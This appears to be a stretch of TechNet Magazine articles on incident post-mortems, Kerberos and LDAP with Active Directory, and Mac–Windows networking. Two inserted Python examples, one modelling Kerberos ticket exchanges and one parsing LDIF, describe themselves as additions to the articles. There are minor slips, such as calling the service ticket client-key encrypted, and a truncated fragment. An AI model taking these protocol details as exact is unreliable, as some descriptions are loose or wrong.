Listen closely to people’s complaints. Gripe sessions are the best source for understanding company friction, whether it’s interpersonal issues, tool malfunctions, or arcane and frustrating processes. If people don’t like a process or tool, they won’t use it. They’ll even circumvent it without considering the possible consequences.

Once the security incident was recognized, how much time elapsed before it was resolved? This is a simple question, but it may have a very complex answer. Depending on the type of incident (virus infestation, e-mailed Trojan, DoS attack, insider exploitation) and how widely its impact was felt across the company, clean up could take hours or days. In fact, clean up may still be happening while you’re having your meeting. You need to decide what marks the end of your incident. Otherwise, events that are holding you up, like waiting for a patch from a vendor, will continue to show up in the documentation of the incident. To avoid this, make sure you close this high-priority ticket and open a separate ticket at a lower priority to track any long-term events.


Response

For a software exploit, you should examine your company's patch process and possibly your firewall configuration. For a viral or Trojan-based infection, you should scrutinize your antivirus software as well as its update schedule on individual computers. You may also want to assess whether viruses and Trojans are filtered at the mail server and if so, how it's done.

Each kind of incident may have a best response, but what is best can vary based on the company's network architecture and information technology design. Consider what might be needed to improve the prevention, detection, and response processes. The first answers that come to mind to solve these problems are more personnel, more education, and better tools.

Did any one person coordinate your company's response to this incident? If you don't have an incident coordinator, consider training several employees to handle this job. Designating a single point of contact for updates is very helpful. For instance, the coordinator can collect data from the various people working on the problem and report it to upper management. This means staff members only have to report to one person, instead of dozens calling them to ask for a status. One person can maintain a timeline and update the trouble ticket, keeping a consistent voice in customer and/or company communication. If you do have an incident coordinator, work with this person to train others. One person cannot be on call constantly to handle any incident that might occur.


Were You Targeted?

Was your company targeted specifically or was this a random attack? The answer could be crucial for future prevention, but difficult to determine. If the attack was targeted, it could be because of your company's politics or affiliations. In the current climate, companies supporting Genetically Modified Organisms (GMO) or the World Trade Organization (WTO) are common targets. Anyone seen as supporting spam may also become a target. High-profile partnerships with controversial organizations can often bring negative attention. For instance, the Electronic Disturbance Theater, which created the Floodnet program, was active through 2003 publicizing various causes by using Floodnet to overwhelm high-profile Web sites. Mexican government Web sites were targeted in support of labor and indigenous rights in Mexico, and biotech-related Web sites were attacked to protest GMO foods. But many attacks are never publicized.

Your company may also have been targeted due to a particular individual—many DoS attacks occur when one person gets angry while chatting with another over Internet Relay Chat. He may sign up the target of his ire for a barrage of e-mail lists, give his e-mail address to spammers, or launch a DoS attack against his IP address, which also happens to be one of your company's IP addresses. Some employees run whole IRC servers on their company's networks, which will incur many attacks. Most ISPs and many companies can tell war stories about any of these types of attack, although very few accounts are actually published. Data privately gathered from chat channels shows that these trends persist despite changes in technology and politics.

Look at the target of the attack and study the possible reasons that it was chosen. Was it your Web page? If so, it's likely the attack was directed at your company specifically. Run some searches and look for calls to action against your company. Consider any public announcements your company has made recently.

Was the target your e-mail server? If so, is it possible that your marketing department sent out a large number of unsolicited e-mails, particularly ones that might be considered spam? Often if a company doesn't provide double opt-in (usually using a confirmation e-mail to make sure that the owner of the e-mail address really wants to be on your mailing list), it can find itself the target of much anger. If you haven't sent out e-mail for a long time, people may have forgotten that they provided their e-mail addresses to your company. Or perhaps your mail server was exploited to relay spam, framing your company for the deed. Spam, actual or perceived, makes people cranky.

Was the target an individual user's IP address? Talk to that user about what he or she was doing at the time the attack commenced. If necessary, mirror the hard drive of the machine and perform a forensic analysis if it wasn't already done during the incident handling process.

Hopefully, if a particular machine encouraged the attack, was targeted by the attack, or started the viral or worm infection, then that machine has already been taken offline and had its hard drive mirrored and examined. If this happens so often that you don't have time to look at all of these problem machines, then you've got a larger issue on your hands.

If the target was a particular machine, look closely at the logs, checking to see whether there were any messages left in them. Sometimes attackers design their attacks so that their angry comments appear in the log files.

Was it a random e-mail that started an infection in your company? Chances are that this is a nonspecific attack, although if it's the type of Trojan that grabs files off users' computers and e-mails them to a specific address, it is possible that a competitor hoped to get sensitive documents from your company. Do you have a copy of the Trojan or virus? If so, either have someone on staff look at the code of the malware or run some searches online and read through any documentation of the malware's innards compiled by a reputable security team. When a piece of malware spreads across the Internet and achieves a certain amount of notoriety, it's commonplace that a number of individuals and teams will go over the code line by line and annotate it or write a general report about what nefarious goals the malware is trying to accomplish.

More Discussion Topics

What was the impact of this incident on the company? If there was no actual damage but the company either disconnected itself from the Internet or was forcibly denied service to the Internet, the only real damage might be to the company's reputation. But a loss of trust on the part of customers or investors can very easily translate to loss of business.

In some intrusions files weren't deleted, but the attacker might have made copies. When files are deleted, you may be able to recover them either from the hard drive or backup media. When files have been copied, there's the possibility that intellectual property has been stolen, which is difficult to detect.

It's always important that your employees have a thorough understanding of why security should be crucial to each of them and what the impact to the whole company could be when they choose to ignore or circumvent security. You definitely want everyone in the organization to understand at least where to report a suspected problem or concern.

Closing the Meeting

The meeting may not come to any sort of natural close, especially if discussions become heated, so make a list of action items. Assign items to the people from whom you need information (such as e-mail timestamps and log files). Follow up with individuals and continue the summary and discussion via e-mail or other group-viewable software. Be willing to provide summarized updates on a regular basis, especially for upper management, but don't overwhelm your constituency with superfluous e-mail.

In closing the meeting, schedule any necessary companywide changes, like a general changing of passwords, which is especially important if the attacker managed to get onto your networks and watch your traffic go by. Even if some of your questions remain unanswered, end the meeting promptly. You and your team will have more than enough work going through the data you've gathered in the meeting and working on creating or improving incident response processes.

Follow Up

If there are questions or issues whose resolution needs active participation from multiple groups, you will have to call another meeting. But if you just need confirmations or input from various groups, try to limit follow-up to e-mail or personal calls to each group. Your main concern should be to address gaps in the various processes, to outline problems (like a lack of tools or a communication failure), and to document any other issues that slow or impede incident response. When reporting your findings, focus on identifying areas for improvement, not on placing blame.

Follow up by educating employees, especially the incident coordinators. Having a group of people who know all the processes and who can guide the various parts of the company to cooperate in response to an issue is important. Work with incident coordinators to fix processes or create new ones. They may also be able to help educate the rest of the company on these processes.

The Big Picture

At the heart of all these issues is one important question: do you have an incident response process that works? The answer is probably yes, although you might not believe it at first. An incident response process can be anything from the phone number of your ISP written on a whiteboard (because you can't access their Web page if your connection is down) to a complex set of steps to follow in an emergency.

Instead of fighting to overlay a whole new process onto a set of people who are probably already working too hard, integrate incident recognition and response handling into the daily work procedure. Going back to the example of ISPs finding DoS attacks, notice that their responses to such events were worked into the normal processes of the operators.

If you've never had a security incident, but you want to apply the lessons of this article, consider having a drill. Invent a fictional security event. Keep it as simple as possible and see how the processes work. You can even conduct a post mortem on the drill. It may be difficult to get people to take you seriously, but it helps if you have the support of management.

Conclusion

Turn your security incident from a possible disaster into a galvanizing event. Let it energize your company and encourage it to improve its incident response processes. It can show your company where the flaws are, not so blame can be apportioned, but instead to allow problems to be fixed. And when you're finished, you'll be prepared for next time. And there will be a next time.


Directory Services and Identity Management

Cross-Platform Security

Mixing It Up: Windows, UNIX, And Active Directory

Peter Larsen and Jason Zions

AT A GLANCE

• Overview of Kerberos 4 and 5
• Transitioning from X.500 to LDAP
• The LDAP model
• Vintela Authentication Services for UNIX and Linux

Peter Larsen is a software development engineer at Microsoft. Before joining Microsoft, Peter was involved in architecture and development of telecom operational software systems and standardization and development of wireless services.

Jason Zions is an architect at Microsoft. Previously he was the chief scientist for Softway Systems, where he led the development of Interix, which later became a part of Microsoft Services For UNIX. Jason has also been heavily involved in POSIX standardization.

This article is adapted from Microsoft Solution Guide for Windows Security and Directory Services for UNIX, available on the TechNet Web site.

As the world becomes more and more connected, a problem has emerged. How do organizations and partners store sensitive data in heterogeneous environments, and how do they verify the identity of users requesting the information on any platform?

Both end users and organizations look for three elements in their security solutions: confidentiality, integrity, and availability. When a user is authenticated, the process can employ any number of methods from passwords (informational) to smartcards (object-based) to biometrics, or ideally, some combination of these techniques. When you are supporting a site that employs a mixture of Windows, UNIX, and Linux servers, you can support all of these elements and methods by choosing Kerberos and LDAP as your protocols of choice.

Active Directory in Windows Server 2003 provides a foundation for identity management, which covers information relating to individuals. Identity management includes the management of computer user accounts, the contact details of those user accounts, door entry system user accounts, application user accounts, e-mail system user addresses and accounts, and more. Identity management solves the problems of maintaining this information. Information on individuals is stored in one place and administered in a consistent manner. The LDAP standard discussed later defines a directory service that can be used as the basis for identity management solutions.

Overview of Kerberos 4

The Kerberos protocol is a standard designed to provide strong authentication within a client/server network environment. Kerberos network messages are encrypted and decrypted using algorithms that translate the Kerberos data into a form that is very difficult to decode into its original form. A secret encryption key is used to encrypt and decrypt the data. Kerberos also uses mathematical techniques called hashes to ensure the integrity of any data that is not encrypted.

Kerberos 4 contains a number of terms and ideas that are important to know.

Principals All entities within Kerberos, including users, computers, and services, are known as principals. Principal names are unique; a hierarchical naming structure ensures their uniqueness.

Realms The principal is a member of a realm. By convention, a realm name is the DNS name converted to uppercase, so that the example.com domain becomes the EXAMPLE.COM realm. Although uppercase realms are not obligatory, using a different case simplifies differentiating between domain names and realms.

Ticket A ticket is the fundamental unit of Kerberos authentication. It is a carefully constructed message containing the authentication information which is passed between computers.

Key Distribution Center The Key Distribution Center (KDC) is made up of three components: a database of principals containing users, computers, and services; an authentication server that issues Ticket Granting Tickets (TGT); and a Ticket Granting Service (TGS) that issues service tickets granting clients access to specific services.

Each realm requires at least one KDC to operate. Kerberos authentication relies on the use of tickets passed between the client, the KDC, and the required server to confirm authentication and authorization.

Figure 1 shows the exchanges that take place during authentication using the Kerberos protocol.

Initially, a client contacts the authentication server component of the KDC, sending a request that contains the principal name, a timestamp, the lifetime of the ticket requested by the client, and the name of the TGS.

In response, the authentication server generates a session key, and makes two copies of it: one for the client, the other for the TGS. The authentication server sends a TGT back to the client; this TGT contains a copy of the session key, the identity of the client, a timestamp, details of the IP address of the client, and of the ticket lifetime. When returning the TGT to the client, the authentication server also returns a copy of the session key, the principal name of the TGS, and the lifetime of the ticket. This whole response to the client is encrypted using the client key.

The client receives the information in this encrypted reply, and is able to decrypt it because it was encrypted with the client's key. This gives the client its session key, as well as a TGT that is still encrypted by the key of the TGS.

The client now forwards the TGT to the ticket-granting server, along with a request for the service to be accessed and a timestamp encrypted with the session key obtained from the authentication server. This timestamp serves to prevent replay attacks, which occur when a request for a service from the client is captured by a hacker and resent at a later date. The TGS processes this request and responds with a new set of session keys, the principal name of the service requested, the lifetime of the ticket, and a service ticket encrypted with the service key.

The service ticket is similar to the TGT and contains a new session key, the principal name of the client, the ticket lifetime, a timestamp, and the client's IP address. All of this is then encrypted with the key of the client and sent.

The final stage of the authentication procedure differs depending on the service and server being requested. This is because each application defines its own methods for the exchange of the service ticket.

An example of a service is the Network File System (NFS). NFS allows for a host to access ("mount") directories that are held on a remote server. This access can be controlled by Kerberos.

Kerberos 5 is an extension of Kerberos 4. It contains all of the functionality of the earlier version, plus many enhancements. These include support for credential forwarding, multiple encryption types, renewable tickets, and preauthentication. Kerberos 5 is the default method of network authentication for services and applications in Windows Server 2003.
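The two exchanges described above (authentication server request and reply, then TGS request and reply with a timestamped authenticator), as an added example that is not from the article or from any Kerberos distribution. It models a single-realm KDC in Python with the standard library only: the sealing primitive is a constructed HMAC-based stand-in for the real cipher, the principal names and passwords are constructed, and the KDC keeps a replay cache next to the timestamp window, because the timestamp alone only limits how long a captured request stays usable.

```python
import hashlib
import hmac
import json
import os

CLOCK_SKEW = 300  # seconds an authenticator timestamp may differ from the KDC clock


def _keystream(key, nonce, length):
    out, ctr = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + ctr.to_bytes(2, "big"), hashlib.sha256).digest()
        ctr += 1
    return out[:length]


def encrypt(key, obj):
    """Seal a dict under key: keystream XOR plus an HMAC tag (constructed stand-in for DES/AES)."""
    plain = json.dumps(obj, sort_keys=True).encode()
    nonce = os.urandom(16)
    body = bytes(a ^ b for a, b in zip(plain, _keystream(key, nonce, len(plain))))
    return nonce + body + hmac.new(key, nonce + body, hashlib.sha256).digest()


def decrypt(key, blob):
    """Verify the tag, then unseal; ValueError means the wrong key or a modified message."""
    nonce, body, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + body, hashlib.sha256).digest()):
        raise ValueError("integrity check failed")
    return json.loads(bytes(a ^ b for a, b in zip(body, _keystream(key, nonce, len(body)))))


class KDC:
    """Principal database plus the two KDC components: authentication server and TGS."""

    def __init__(self, realm):
        self.tgs = "krbtgt/" + realm              # the TGS is itself a principal
        self.keys = {self.tgs: os.urandom(32)}    # long-term key per principal
        self.seen = set()                         # (client, timestamp) of used authenticators

    def add_principal(self, name, password):
        self.keys[name] = hashlib.sha256(password.encode()).digest()  # string-to-key stand-in

    def authentication_server(self, req):
        """AS-REQ -> AS-REP; no password check (Kerberos 4 has no preauthentication)."""
        skey = os.urandom(32).hex()
        tgt = {"session_key": skey, "client": req["client"], "timestamp": req["timestamp"],
               "client_ip": req["client_ip"], "lifetime": req["lifetime"]}
        rep = {"session_key": skey, "tgs": req["tgs"], "lifetime": req["lifetime"],
               "tgt": encrypt(self.keys[req["tgs"]], tgt).hex()}   # TGT sealed under TGS key
        return encrypt(self.keys[req["client"]], rep)             # reply sealed under client key

    def ticket_granting_service(self, tgt_blob, service, authenticator, now):
        """TGS-REQ -> TGS-REP: validate TGT and authenticator, then issue a service ticket."""
        tgt = decrypt(self.keys[self.tgs], tgt_blob)
        if now > tgt["timestamp"] + tgt["lifetime"]:
            raise ValueError("TGT expired")
        skey = bytes.fromhex(tgt["session_key"])
        auth = decrypt(skey, authenticator)        # only the session-key holder could seal this
        if auth["client"] != tgt["client"] or abs(now - auth["timestamp"]) > CLOCK_SKEW:
            raise ValueError("authenticator stale or client mismatch")
        if (auth["client"], auth["timestamp"]) in self.seen:
            raise ValueError("replay: this authenticator was already used")
        self.seen.add((auth["client"], auth["timestamp"]))
        svc_skey = os.urandom(32).hex()
        ticket = {"session_key": svc_skey, "client": tgt["client"], "lifetime": tgt["lifetime"],
                  "timestamp": now, "client_ip": tgt["client_ip"]}
        rep = {"session_key": svc_skey, "service": service, "lifetime": tgt["lifetime"],
               "ticket": encrypt(self.keys[service], ticket).hex()}  # sealed under service key
        return encrypt(skey, rep)                  # sealed under the client's AS session key


def client_login(kdc, name, password, client_ip, service, now, lifetime=8 * 3600):
    """Client side of both exchanges; returns (decrypted TGS reply, the TGS request sent)."""
    ckey = hashlib.sha256(password.encode()).digest()  # same string-to-key stand-in as the KDC
    as_req = {"client": name, "timestamp": now, "lifetime": lifetime, "tgs": kdc.tgs,
              "client_ip": client_ip}
    as_rep = decrypt(ckey, kdc.authentication_server(as_req))
    skey = bytes.fromhex(as_rep["session_key"])    # the client's copy of the session key
    authenticator = encrypt(skey, {"client": name, "timestamp": now})
    request = (bytes.fromhex(as_rep["tgt"]), service, authenticator)
    return decrypt(skey, kdc.ticket_granting_service(*request, now)), request


def service_accepts(service_key, ticket_blob, now):
    """Final stage: the service unseals the ticket with its own key and learns the client."""
    ticket = decrypt(service_key, ticket_blob)
    if now > ticket["timestamp"] + ticket["lifetime"]:
        raise ValueError("service ticket expired")
    return ticket["client"]


def replay_is_rejected(kdc, request, now):
    """Defender's check: resend a captured TGS request and confirm the KDC refuses it."""
    try:
        kdc.ticket_granting_service(*request, now)
        return False
    except ValueError:
        return True
```

A wrong password never reaches the TGS: the client simply fails to unseal the AS reply, which is the Kerberos 4 behaviour that preauthentication in Kerberos 5 tightens.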


Figure 1 Authentication with Kerberos (figure: Client and Authentication Server; Authentication Server Request: Client Principal, Client Timestamp, Requested Lifetime, Name of TGS; Authentication Server Reply: User's Copy of Session Key, Name of TGS, Ticket Lifetime, TGS Copy of Session Key, Client Principal)


A large number of distributions of the Kerberos protocol are available, both commercial and open source. Most major UNIX distributions contain an implementation of Kerberos as part of a standard installation. There are two open source Kerberos 5 distributions, MIT and Heimdal; information about the Heimdal version is available at www.pdc.kth.se/heimdal.

MIT Kerberos is simple to compile across all platforms and works well with all other implementations. While precompiled versions are available for download from other sources, it is recommended that you download and verify the integrity of the source yourself to ensure the best security. MIT Kerberos is available for download from web.mit.edu/kerberos/www.

Some countries have restrictions on the use of cryptography, so confirm that Kerberos is acceptable under your country's laws before implementing a Kerberos solution.


The LDAP standard is used for authentication and directory services, and has also evolved into a simple method of accessing X.500. The X.500 standard is designed to have one worldwide distributed directory with a standard access interface. It is extremely complex, as are the Open System Interconnection (OSI) network protocols over which it was designed to operate. In fact, OSI network protocols are far more complex than the more commonly used TCP/IP suite.

LDAPv3 is widely implemented as a part of operating systems, network operating systems, directory services, applications such as e-mail servers, and client applications. LDAPv3 is a core component of Windows Server 2003 Active Directory. The implementation of LDAPv3 found in Active Directory is fully integrated with a standards-compliant security system based on Kerberos and Microsoft Windows.

tocol, LDAP defines the operations used to communicate with a directory service, how to refer to an entity in the directory, how to describe the attributes of an entity and, finally, the security features that can be used to authenticate to the directory and control access to the entities within the directory. LDAP is characterized by the following:

• The protocol is carried directly over TCP for connection-oriented transport (receipt of data is acknowledged) and User Datagram Protocol (UDP) for connectionless transport (no acknowledgment upon sending or receiving data).
• Most protocol data elements, such as distinguished names, can be encoded as ordinary strings.
• Referrals to other servers can be returned to the client.
• Simple Authentication and Security Layer (SASL) mechanisms can be used with LDAP in order to provide associated security services.
• Attribute values and distinguished names can be internationalized through the use of the International Organization for Standardization (ISO) 10646 character set.
• The protocol can be extended to support new operations, and controls can be used to extend existing operations. The schema is then published through an attribute on the root object for use by the clients.

The component models defined in LDAP are the same as those defined in X.500, and are explained in the following sections.


The attributes and characteristics associated with an entry are defined in the entry's object classes. The definition of object classes and attributes, in turn, is held in the schema. The following are the three types of object class definitions that are used in LDAP directory servers:

Structural object class A structural object class represents a real-world object, such as a person. An entity must belong to one and only one structural object class.

Auxiliary object class An auxiliary object class is used to extend a structural object class. It has no meaning on its own.

Abstract object class The abstract object class is used only when it is an ancestor of a derived class.


The Naming Model

The naming model defines how each entry can be referenced. In an LDAP directory, entries are organized in a hierarchical tree called a Directory Information Tree (DIT). Each node in the tree is an entry that can store information, and also serve as a container for other entries. An entry in the tree can be referenced by using either its relative distinguished name (RDN) or its distinguished name (DN). An RDN is unique only within a particular directory; a DN is globally unique.

An RDN for an attribute might be the common name (cn) of an object, as you can see in this attribute:

cn="Michael Allen"

An RDN could also be made up of more than one attribute value when uniqueness cannot be ensured by simply using a single attribute. For example:

cn="Michael Allen"+ou="Engineering"

The plus (+) symbol in this example makes it clear that the RDN is multi-valued. The practicality of multi-valued RDNs is clear when your organization has two employees named Michael Allen. If they are in two different departments, they can have RDNs which are uniquely qualified by department, as defined in the example by the organization unit (ou) attribute. The DN for Michael Allen's entry might be:

cn="Michael Allen",dc="example",dc="com"

In this case, the object is uniquely defined in the local directory as well as globally. The domain component (dc) attribute values are used to uniquely define the DNS domain name of the directory server.

In LDAP, the naming context for a directory can be defined in either a geographical or a domain name format. The geographical format was the primary method of locating a directory in X.500, and is still used with LDAP servers. However, it is common to use the domain name of an LDAP server as its naming context because domain names are globally unique on the Internet.

In Figure 2, the naming context of the directory server is the domain name example.com, or the DN dc=example, dc=com. The DN uses ou="Users" instead of cn="Users". In this case cn and ou are interchangeable because the common name of an organizational unit is identical to the name of the organizational unit.

The Functional Model

The functional model is the method by which a directory client can communicate with the directory; this role is filled by the LDAP protocol itself. LDAP provides the following operations:

• Interrogation: searching the directory
• Modification: updating, adding, or deleting entries in the directory
• Authentication and control: authenticating to the directory (also known as the bind operation)

The Security Model

The security model provides methods for authenticating against the directory and for authorizing client access control to the directory. There are two components to the security model: authentication using LDAP binds and the control of any access to objects in the directory.

We'll cover the details of authentication to LDAP a little later in the article, but once the client is authenticated, it can use the LDAP directory only as defined by the directory's Access Control Lists (ACLs). The use of ACLs in an LDAP directory is implementation-dependent.


The LDAP Interchange Format

LDAP directories can exchange data and schema definitions using a standard notation called the LDAP Interchange Format (LDIF). LDIF has a simple text file format that consists of the following:

• Entries separated by blank lines representing a single entity
• Comments beginning with the pound character (#)
• Assignments of values to attributes
• Directives that instruct the LDIF parser on how to interpret the entries

An LDIF file showing the definition of a person entity is shown in the following example. This LDIF file could be used to create the entity in an LDAP directory:

# This is a comment
dn: cn=Michael Allen,cn=Users,dc=example,dc=com
objectClass: person
cn: Michael Allen
sn: Reid
telephoneNumber: 555-0100

The last line is a blank line. This file defines an entity with the DN:

cn=Michael Allen,cn=Users,dc=example,dc=com

The entry is a member of object class person, which contains attributes such as the common name (cn) of a person, a person's surname (sn), and a person's telephone number (telephoneNumber).
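A parser for the DN and RDN syntax from the naming model section and for the LDIF entry shape shown above, added here as an example and not code from the article. It assumes RFC 2253 style DNs (backslash escapes, "+" joining the components of a multi-valued RDN, and the article's legacy quoted values stripped), a constructed LDIF sample that repeats the article's entry and adds a second entry with a multi-valued RDN, and a final check for the naming rule that an entry must store the attribute values that appear in its own RDN.

```python
SAMPLE_LDIF = """\
# Constructed sample: the article's entry plus a second entry with a multi-valued RDN
dn: cn=Michael Allen,cn=Users,dc=example,dc=com
objectClass: person
cn: Michael Allen
sn: Reid
telephoneNumber: 555-0100

dn: cn=Michael Allen+ou=Engineering,ou=Users,dc=example,dc=com
objectClass: person
cn: Michael Allen
ou: Engineering
sn: Allen
telephoneNumber: 555-0199
"""


def _split_unescaped(text, sep):
    """Split on sep, but not on a sep preceded by a backslash (the RFC 2253 escape)."""
    parts, cur, i = [], "", 0
    while i < len(text):
        if text[i] == "\\" and i + 1 < len(text):
            cur, i = cur + text[i:i + 2], i + 2      # keep the escape for the next stage
        elif text[i] == sep:
            parts.append(cur)
            cur, i = "", i + 1
        else:
            cur, i = cur + text[i], i + 1
    parts.append(cur)
    return parts


def _unescape(value):
    """Drop the legacy surrounding quotes used in the article, then backslash escapes."""
    if len(value) >= 2 and value[0] == value[-1] == '"':
        value = value[1:-1]
    out, i = "", 0
    while i < len(value):
        if value[i] == "\\" and i + 1 < len(value):
            out, i = out + value[i + 1], i + 2
        else:
            out, i = out + value[i], i + 1
    return out


def parse_dn(dn):
    """RDNs leaf first, each a list of (attr, value) pairs so cn=X+ou=Y keeps both parts."""
    rdns = []
    for rdn in _split_unescaped(dn, ","):
        pairs = []
        for ava in _split_unescaped(rdn, "+"):
            attr, sep, value = ava.partition("=")
            if not sep:
                raise ValueError("RDN component without '=': %r" % ava)
            pairs.append((attr.strip().lower(), _unescape(value.strip())))
        rdns.append(pairs)
    return rdns


def parent_dn(dn):
    """Strip the leaf RDN: the DN of the containing entry in the DIT."""
    return ",".join(_split_unescaped(dn, ",")[1:])


def naming_context(dn):
    """Join the dc values into the DNS domain the directory is named after."""
    return ".".join(v for rdn in parse_dn(dn) for a, v in rdn if a == "dc")


def parse_ldif(text):
    """LDIF to entries (attr -> list of values): '#' comments, blank separators, folded lines."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]                  # continuation line: drop the leading space
        else:
            lines.append(raw)
    entries, entry = [], {}
    for line in lines + [""]:                     # trailing "" flushes the last entry
        if line.startswith("#"):
            continue
        if not line.strip():
            if entry:
                entries.append(entry)
            entry = {}
            continue
        attr, sep, value = line.partition(":")
        if not sep:
            raise ValueError("malformed LDIF line: %r" % line)
        entry.setdefault(attr.strip(), []).append(value.strip())
    return entries


def rdn_attributes_missing(entry):
    """Naming rule: every (attr, value) in the entry's RDN must be stored on the entry too."""
    leaf = parse_dn(entry["dn"][0])[0]
    stored = {k.lower(): v for k, v in entry.items()}
    return [(a, v) for a, v in leaf if v not in stored.get(a, [])]
```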


Using LDAP for Network Authentication

LDAP authentication involves an entity binding to the LDAP server. The success of the bind operation is determined by the acceptance or rejection of the entity's credentials. If the bind is successful, the entity is authenticated; if it is unsuccessful, the entity is not authenticated.

In order for LDAP to be used for UNIX and Linux login or service authentication, it needs to be coupled with the LDAP Pluggable Authentication Module (PAM). Unlike Kerberos, which is designed as an authentication mechanism, LDAP authentication is designed specifically for securing directory transactions. Using LDAP authentication for purposes other than LDAP directory access can lead to performance problems. This is because LDAP directory services are not designed to handle large numbers of authentication requests, but are instead tuned to perform well when handling directory transactions.

Figure 2 Naming (figure: a DIT with DN dc=example,dc=com; DN ou=Users,dc=example,dc=com; DN cn=Michael Allen,ou=Users,dc=example,dc=com, whose RDN is cn=Michael Allen; ou=sites; DN = Distinguished Name, RDN = Relative Distinguished Name)

Figure 3 Active Directory (figure: Active Directory at the center, linked to Windows Users: Account Info, Privileges, Profiles, Policy; Other NOS: User Registry, Security, Policy; Other Directories: White Pages, E-commerce; E-mail Servers: Mailbox Info, Address Book; Windows Clients: Management Profile, Network Info, Policy; Applications: Server Config, Single Sign-on, App-specific Directory Info, Policy; Windows Servers: Services, Printers, File Shares, Policy; Network Devices: Configuration, QoS Policy, Security Policy; Firewall Services: Configuration, Security Policy, VPN Policy; Internet)


Microsoft Active Directory

Active Directory is an essential and inseparable part of the network architecture that improves on the domain architecture of the Windows NT 4.0 operating system to provide a directory service designed for distributed networking environments. Introduced in Windows 2000, Active Directory is an integral part of Windows Server 2003. Active Directory is built around the Kerberos 5 and LDAPv3 protocols and, as such, is compatible with Kerberos 5 clients and LDAPv3 clients across all platforms. This allows Windows Active Directory servers to provide security and directory services in a heterogeneous network.

Combined, these technologies enable organizations to apply standardized business rules to distributed applications and network resources without requiring administrators to maintain a variety of specialized directories. An overview of Active Directory is shown in Figure 3.

60 TechNet Magazine

Vintela Authentication Services

As with Active Directory, UNIX and Linux systems typically include their own implementations of both Kerberos and LDAP. Although these implementations can interoperate with Active Directory, they are typically written without considering the way that Microsoft has integrated the two standards in Active Directory.

Vintela Authentication Services (VAS) implements Kerberos and LDAP functionality on UNIX and Linux systems, and can fully integrate with Active Directory. The benefits of using VAS include the following:

UNIX and Linux users and computers are managed through the Active Directory Users and Computers Microsoft Management Console (MMC) snap-in.

Kerberos is the protocol used to secure LDAP traffic.

Performance is tuned to work effectively with Active Directory.

The VAS product allows UNIX and Linux clients to operate within an Active Directory domain in a manner equivalent to Windows clients.


Summary

In this article, we've discussed the basic technologies necessary to achieve single sign-on between networked computers with a variety of operating systems. Detailed instructions on how to configure single sign-on between, say, Linux and Windows are given in the online guide listed in the references. The guide describes two methods of achieving single sign-on, one using open source code and the other using the commercially available Vintela product. With these new technologies in hand, you'll finally be able to deliver on the promise of information access any time, on any device and on any platform.



AT A GLANCE

Cross-Platform Security

Jay Shaw

Yes, You Can! Secure Your Mac On A Windows Network

• Connecting a Mac to your Windows-based network
• Configuration of different Mac OS versions
• Security considerations and network services

Jay Shaw is an independent network consultant. His company, Network Consulting Services, is located on Long Island in New York. He can be reached at info@ncservices.net.

If you work in network support for Windows, sooner or later it's bound to happen. You'll be sitting quietly at your desk, and someone will walk up with a long list of questions about their Apple Macintosh computer. How do we connect it to the existing network? How will users access file shares, print, browse the Internet, and use e-mail? What do you do? You don't know anything about a Mac beyond plugging it into the wall. In a perfect world, you could plug in any device and go to work. Unfortunately, it's a little more involved than that. It isn't as hard as it sounds, though, nor is it as difficult as it used to be. Just remember that there is more than one way to peel an Apple!

First, you need to determine which Mac OS you're working with. If you need to support only the Classic Mac OS (OS 9.x or older), your choices are simple, but limited. Obtaining support for the platform will become increasingly difficult as time progresses. Supporting Mac OS X is more complicated, but you also have many more options at your disposal. You might need to support both versions of the OS. You can provide file and printer sharing on either platform. More advanced functionality like integration with Active Directory is only available in an OS X environment, and requires a little more planning.


Services for Macintosh

If you only need to support the Classic Mac OS or need both Classic and OS X, the best approach is to install Services for Macintosh (SFM) on your server running Windows. Once it is loaded, the server can designate directories as Mac-accessible volumes. These volumes can be seen from machines running either the Classic Mac OS or OS X, and can even be shared with Windows-based clients at the same time. The server running Windows stores the Mac files on NTFS volumes and ensures that NTFS file names are properly supported.

SFM also allows for support of the Classic Mac file format. Classic Macs store files in two pieces called forks: a data fork and a resource fork. As the name implies, the data fork contains data. For executables, this is where the program's instructions are stored. The resource fork contains the file's resources, which can include items like icons, sounds, fonts, and images. SFM permits the server running Windows to store both forks in a single file; the resource fork is kept in an NTFS alternate data stream, which is why SFM volumes must be on NTFS.

Once you have loaded SFM and configured file permissions, you can connect to your server from a Mac, but note that file permissions for the Mac and the PC are configured separately. You will be required to authenticate using your domain user name and password for resources. While this is important functionality, it only provides basic file sharing. It also only allows you to serve files in one direction: Windows-based server to Mac.


In the past, it was necessary to load the AppleTalk protocol to support Macintosh clients, but Windows now supports Apple Filing Protocol (AFP) over TCP/IP. This means that your Mac volumes are available to your clients through TCP/IP. The AppleTalk protocol is no longer needed in many cases. Even Apple has moved on and no longer promotes its use. However, keep in mind that if you want to eliminate AppleTalk, you will need the DNS name or the IP address of the server you want to connect to. You cannot browse for Apple resources without AppleTalk.

If you want to continue to use the AppleTalk protocol, the Windows-based server can act as an AppleTalk router. It also has the ability to seed or define your AppleTalk network exactly as if it was a native Macintosh server.

Apple provides a client, or User Authentication Module (UAM), right out of the box in both the Classic and OS X environments for connection to SFM, but it's not a very secure solution. It only supports eight-character passwords. This invariably causes problems when users with longer passwords attempt to access a resource. The Apple UAM also does little to hide these passwords as they travel over your network, for little or no encryption is applied. Because of these shortcomings, it's important to use the Microsoft UAM instead. The Microsoft UAM supports 14-character passwords and uses stronger encryption. SFM and the UAM are available as free downloads from the Microsoft Web site at www.microsoft.com/mac/otherproducts/otherproducts.aspx?pid=windows2000sfm.

www.technetmagazine.com

Figure 1 Mac Server and Share Authentication Dialog Box (Connect To Server dialog: Server Address smb://servername/sharename, a Favorite Servers list with a Remove button, and Browse and Connect buttons)

While this solution does provide a good deal of functionality, there are still a number of limitations. For example, Classic Macs are often configured without a centralized login; you log in to each resource separately. You only have access to folders configured as Mac volumes on Classic Macs. Browsing for resources is very limited. Shares must be configured twice if you need access to the same files from the PC and the Mac, and security is not very robust. There is also no support for Distributed File System (DFS) shares, file shares that are spread across several servers to provide better redundancy.

Printing is a little more flexible, however. By loading print sharing for Macintosh on your server, the Mac clients will have access to any printers that have been shared from your Windows server. Any AppleTalk printers connected to the network can be configured for use by any of the Windows-based clients as well.

